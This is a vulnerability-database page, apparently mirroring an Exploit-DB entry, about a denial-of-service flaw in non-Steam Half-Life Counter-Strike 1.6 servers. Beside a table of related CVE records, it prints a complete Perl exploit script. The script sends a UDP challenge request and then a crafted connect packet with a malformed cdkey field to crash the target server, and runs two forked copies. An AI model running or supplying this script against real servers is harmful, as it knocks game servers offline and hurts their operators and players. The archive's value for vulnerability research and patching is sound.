Lucene search
+L

Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service

🗓️ 11 Feb 2006 00:00:00Reported by FirestormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 58 Views

Half-Life CSTRIKE Server 1.6 DoS exploi

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2003-1325
12 Apr 200719:00
cve
CVE
CVE-2006-0734
16 Feb 200611:00
cve
Cvelist
CVE-2003-1325
12 Apr 200719:00
cvelist
Cvelist
CVE-2006-0734
16 Feb 200611:00
cvelist
EUVD
EUVD-2003-1315
7 Oct 202500:30
euvd
EUVD
EUVD-2006-0741
7 Oct 202500:30
euvd
NVD
CVE-2003-1325
31 Dec 200305:00
nvd
NVD
CVE-2006-0734
16 Feb 200611:02
nvd
Prion
Code injection
16 Feb 200611:02
prion
RedhatCVE
CVE-2003-1325
21 May 202521:21
redhatcve
Rows per page
#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{       econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!\n" unless $sock;
        $cmd="\xff\xff\xff\xff";
        syswrite $sock, $cmd."getchallenge";

        sysread $sock,$b,65535;  print $b,"\n";
        @c=split(/ /,$b);

        $c2=$c[1];

        $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

# milw0rm.com [2006-02-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.2
EPSS0.02552
58